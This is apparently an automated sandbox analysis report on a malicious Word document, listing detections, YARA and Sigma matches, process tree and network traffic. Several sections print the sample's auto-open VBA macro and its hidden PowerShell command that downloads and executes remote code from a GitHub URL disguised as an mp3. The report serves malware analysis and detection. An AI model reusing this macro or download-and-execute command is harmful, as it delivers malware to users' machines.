Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report RfORrHIRNe.doc

Overview

General Information

Sample Name:RfORrHIRNe.doc
Analysis ID:515215
MD5:955d5d2855b291a3cf1fc6655bbbbb79
SHA1:b58901cf8967310228bc6e4c224b2cfaf014bc65
SHA256:63acfd6633bf3fe6462d8de72904338e2a97392654d8b39a97d18b9e7f3b25b8
Infos:

Most interesting Screenshot:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Found detection on Joe Sandbox Cloud Basic with higher score
Antivirus detection for dropped file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Suspicious powershell command line found
Machine Learning detection for sample
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Stores large binary data to the registry
Document contains an embedded VBA macro which executes code when the document is opened / closed
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Document contains no OLE stream with summary information
Sigma detected: PowerShell Download from URL
Potential document exploit detected (unknown TCP traffic)
Document contains embedded VBA macros
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1912 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • powershell.exe (PID: 2784 cmdline: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
RfORrHIRNe.docPowerShell_in_Word_DocDetects a powershell and bypass keyword in a Word documentFlorian Roth
  • 0x72c7:$s1: Powershell.exe
  • 0x72f1:$s2: Bypass
RfORrHIRNe.docPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x72e0:$sb1: -W Hidden
  • 0x72d5:$sc1: -NoP
  • 0x72da:$sd1: -NonI
  • 0x72ea:$se2: -Exec Bypass
  • 0x72ea:$se4: -Exec Bypass

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{A8188D20-C63E-41BC-839A-5E99E4F44AC7}.tmpPowerShell_in_Word_DocDetects a powershell and bypass keyword in a Word documentFlorian Roth
  • 0x1f47:$s1: Powershell.exe
  • 0x1f71:$s2: Bypass
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{A8188D20-C63E-41BC-839A-5E99E4F44AC7}.tmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x1f60:$sb1: -W Hidden
  • 0x1f55:$sc1: -NoP
  • 0x1f5a:$sd1: -NonI
  • 0x1f6a:$se2: -Exec Bypass
  • 0x1f6a:$se4: -Exec Bypass
C:\Users\user\AppData\Local\Temp\~DFB0DD1817E66C3CA2.TMPPowerShell_in_Word_DocDetects a powershell and bypass keyword in a Word documentFlorian Roth
  • 0x151f:$s1: Powershell.exe
  • 0x1549:$s2: Bypass
C:\Users\user\AppData\Local\Temp\~DFB0DD1817E66C3CA2.TMPPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x1538:$sb1: -W Hidden
  • 0x152d:$sc1: -NoP
  • 0x1532:$sd1: -NonI
  • 0x1542:$se2: -Exec Bypass
  • 0x1542:$se4: -Exec Bypass

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.435852554.00000000002D0000.00000004.00000020.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x3039:$sb1: -W Hidden
  • 0x302e:$sc1: -NoP
  • 0x3033:$sd1: -NonI
  • 0x3043:$se2: -Exec Bypass
  • 0x3043:$se4: -Exec Bypass

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), CommandLine: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1912, ProcessCommandLine: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), ProcessId: 2784
Sigma detected: PowerShell Download from URLShow sources
Source: Process startedAuthor: Florian Roth, oscd.community, Jonhnathan Ribeiro: Data: Command: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), CommandLine: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1912, ProcessCommandLine: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), ProcessId: 2784
Sigma detected: Windows Suspicious Use Of Web Request in CommandLineShow sources
Source: Process startedAuthor: James Pemberton / @4A616D6573: Data: Command: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), CommandLine: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1912, ProcessCommandLine: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), ProcessId: 2784
Sigma detected: Non Interactive PowerShellShow sources
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), CommandLine: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1912, ProcessCommandLine: Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3'), ProcessId: 2784

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: RfORrHIRNe.docVirustotal: Detection: 49%Perma Link
Antivirus / Scanner detection for submitted sampleShow sources
Source: RfORrHIRNe.docAvira: detected
Antivirus detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\~DFB0DD1817E66C3CA2.TMPAvira: detection malicious, Label: HEUR/Macro.Agent
Machine Learning detection for sampleShow sources
Source: RfORrHIRNe.docJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.436424156.0000000002937000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000002.00000002.436424156.0000000002937000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.436424156.0000000002937000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000002.00000002.436424156.0000000002937000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000002.00000002.436424156.0000000002937000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.436424156.0000000002937000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: global trafficDNS query: name: github.com
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 140.82.121.4:80
Source: global trafficTCP traffic: 192.168.2.22:49168 -> 140.82.121.3:443
Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: global trafficHTTP traffic detected: GET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ssbb36/stv/main/5.mp3 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1Host: github.comConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
Source: powershell.exe, 00000002.00000002.440796081.000000001CC50000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000002.00000002.435863412.000000000030E000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000002.00000002.435863412.000000000030E000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000002.00000002.440658441.000000001B5AB000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000002.00000002.440658441.000000001B5AB000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000002.00000002.440658441.000000001B5AB000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000002.00000002.440658441.000000001B5AB000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000002.00000002.440658441.000000001B5AB000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000002.00000002.437505499.00000000036FC000.00000004.00000001.sdmpString found in binary or memory: http://github.co
Source: powershell.exe, 00000002.00000002.436509388.0000000002DAF000.00000004.00000001.sdmpString found in binary or memory: http://github.com
Source: powershell.exe, 00000002.00000002.437505499.00000000036FC000.00000004.00000001.sdmpString found in binary or memory: http://github.com/ssbb36
Source: powershell.exe, 00000002.00000002.437505499.00000000036FC000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmpString found in binary or memory: http://github.com/ssbb36/stv/raw
Source: powershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmpString found in binary or memory: http://github.com/ssbb36/stv/raw/main/2.mp3
Source: powershell.exe, 00000002.00000002.436509388.0000000002DAF000.00000004.00000001.sdmpString found in binary or memory: http://github.com/ssbb36/stv/raw/main/2.mp3PE
Source: powershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmpString found in binary or memory: http://github.com/ssbb36/stv/raw/main/3.mp3
Source: powershell.exe, 00000002.00000002.436509388.0000000002DAF000.00000004.00000001.sdmpString found in binary or memory: http://github.com/ssbb36/stv/raw/main/3.mp3PE
Source: powershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmpString found in binary or memory: http://github.com/ssbb36/stv/raw/main/4.mp3
Source: powershell.exe, 00000002.00000002.436509388.0000000002DAF000.00000004.00000001.sdmpString found in binary or memory: http://github.com/ssbb36/stv/raw/main/4.mp3PE
Source: RfORrHIRNe.docString found in binary or memory: http://github.com/ssbb36/stv/raw/main/5.mp3
Source: powershell.exe, 00000002.00000002.436509388.0000000002DAF000.00000004.00000001.sdmpString found in binary or memory: http://github.com/ssbb36/stv/raw/main/5.mp3PE
Source: powershell.exe, 00000002.00000002.440796081.000000001CC50000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
Source: powershell.exe, 00000002.00000002.440796081.000000001CC50000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000002.00000002.441095276.000000001CE37000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: powershell.exe, 00000002.00000002.441095276.000000001CE37000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000002.00000002.440658441.000000001B5AB000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000002.00000002.440658441.000000001B5AB000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000002.00000002.435927602.00000000003B1000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000002.00000002.435863412.000000000030E000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000002.00000002.440658441.000000001B5AB000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000002.00000002.440658441.000000001B5AB000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000002.00000002.440658441.000000001B5AB000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000002.00000002.436097015.0000000002380000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000002.00000002.441095276.000000001CE37000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000002.00000002.441095276.000000001CE37000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000002.00000002.436097015.0000000002380000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000002.00000002.440658441.000000001B5AB000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000002.00000002.440658441.000000001B5AB000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000002.00000002.440796081.000000001CC50000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: powershell.exe, 00000002.00000002.441095276.000000001CE37000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000002.00000002.440796081.000000001CC50000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000002.00000002.440796081.000000001CC50000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmpString found in binary or memory: https://github.c
Source: powershell.exe, 00000002.00000002.436509388.0000000002DAF000.00000004.00000001.sdmpString found in binary or memory: https://github.com
Source: powershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmpString found in binary or memory: https://github.com/ssbb3
Source: powershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmpString found in binary or memory: https://github.com/ssbb36/stv/ra
Source: powershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmpString found in binary or memory: https://github.com/ssbb36/stv/raw/main/1.mp3
Source: powershell.exe, 00000002.00000002.436509388.0000000002DAF000.00000004.00000001.sdmpString found in binary or memory: https://github.com/ssbb36/stv/raw/main/1.mp3PE
Source: powershell.exe, 00000002.00000002.436509388.0000000002DAF000.00000004.00000001.sdmpString found in binary or memory: https://github.com/ssbb36/stv/raw/main/5.mp3
Source: powershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmpString found in binary or memory: https://notebooks.githubusercontent.com
Source: powershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmpString found in binary or memory: https://raw.githubuserco
Source: powershell.exe, 00000002.00000002.436509388.0000000002DAF000.00000004.00000001.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000002.00000002.436509388.0000000002DAF000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmpString found in binary or memory: https://raw.githubusercontent.com/ssbb36/stv/main/5.mp3
Source: powershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmpString found in binary or memory: https://render.githubusercontent.com
Source: powershell.exe, 00000002.00000002.435863412.000000000030E000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000002.00000002.438268620.00000000037F7000.00000004.00000001.sdmpString found in binary or memory: https://viewscreen.githubusercontent.com
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D1CEAA27-5E98-4FA5-88E5-2DF8BA910B6B}.tmpJump to behavior
Source: unknownDNS traffic detected: queries for: github.com
Source: global trafficHTTP traffic detected: GET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ssbb36/stv/main/5.mp3 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1Host: github.comConnection: Keep-Alive

System Summary:

barindex
Found detection on Joe Sandbox Cloud Basic with higher scoreShow sources
Source: RfORrHIRNe.docJoe Sandbox Cloud Basic: Detection: malicious Score: 96Perma Link
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: RfORrHIRNe.docOLE, VBA macro line: Shell ("Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')")
Source: ~DFB0DD1817E66C3CA2.TMP.0.drOLE, VBA macro line: Shell ("Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')")
Source: RfORrHIRNe.doc, type: SAMPLEMatched rule: PowerShell_in_Word_Doc date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905
Source: RfORrHIRNe.doc, type: SAMPLEMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: 00000002.00000002.435852554.00000000002D0000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{A8188D20-C63E-41BC-839A-5E99E4F44AC7}.tmp, type: DROPPEDMatched rule: PowerShell_in_Word_Doc date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{A8188D20-C63E-41BC-839A-5E99E4F44AC7}.tmp, type: DROPPEDMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: C:\Users\user\AppData\Local\Temp\~DFB0DD1817E66C3CA2.TMP, type: DROPPEDMatched rule: PowerShell_in_Word_Doc date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905
Source: C:\Users\user\AppData\Local\Temp\~DFB0DD1817E66C3CA2.TMP, type: DROPPEDMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: ~WRF{A8188D20-C63E-41BC-839A-5E99E4F44AC7}.tmp.0.drOLE indicator application name: unknown
Source: ~DFB0DD1817E66C3CA2.TMP.0.drOLE indicator application name: unknown
Source: RfORrHIRNe.docOLE, VBA macro line: Sub Autoopen()
Source: ~DFB0DD1817E66C3CA2.TMP.0.drOLE, VBA macro line: Sub Autoopen()
Source: ~WRF{A8188D20-C63E-41BC-839A-5E99E4F44AC7}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFB0DD1817E66C3CA2.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{A8188D20-C63E-41BC-839A-5E99E4F44AC7}.tmp.0.drOLE indicator has summary info: false
Source: ~DFB0DD1817E66C3CA2.TMP.0.drOLE indicator has summary info: false
Source: RfORrHIRNe.docOLE indicator, VBA macros: true
Source: ~DFB0DD1817E66C3CA2.TMP.0.drOLE indicator, VBA macros: true
Source: RfORrHIRNe.docVirustotal: Detection: 49%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............................................`I.........v.....................K......................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#................@.k.....)..............................}..v....(*......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............#A.k......T.............................}..v.....0......0...............................X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../................@.k.....1..............................}..v....(2......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............#A.k......T.............................}..v.....7......0.......................~.......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;................@.k....H8..............................}..v.....8......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.......A.t. .l.i.n.e.:.2. .c.h.a.r.:.1.8...............}..v.....<......0...............h.T.....".......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G................@.k.....=..............................}..v.....>......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............#A.k......T.............................}..v.....D......0...............................X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S................@.k.....E..............................}..v.....F......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.......u.t.F.i.l.e. .".t.e.m.p.5.4.6.8.5.".............}..v.... J......0...............h.T.....$.......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._................@.k.....J..............................}..v....XK......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............#A.k......T.............................}..v.... R......0...............................X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k................@.k.....R..............................}..v....XS......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n......W......0...............h.T.....4.......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w................@.k....@X..............................}..v.....X......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................#A.k......T.............................}..v.....^......0.......................l.......X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k.....^..............................}..v....8_......0.................T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......#A.k......T.............................}..v.....b......0...............h.T.............X...............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................@.k.....c..............................}..v.....d......0.................T.............X...............Jump to behavior
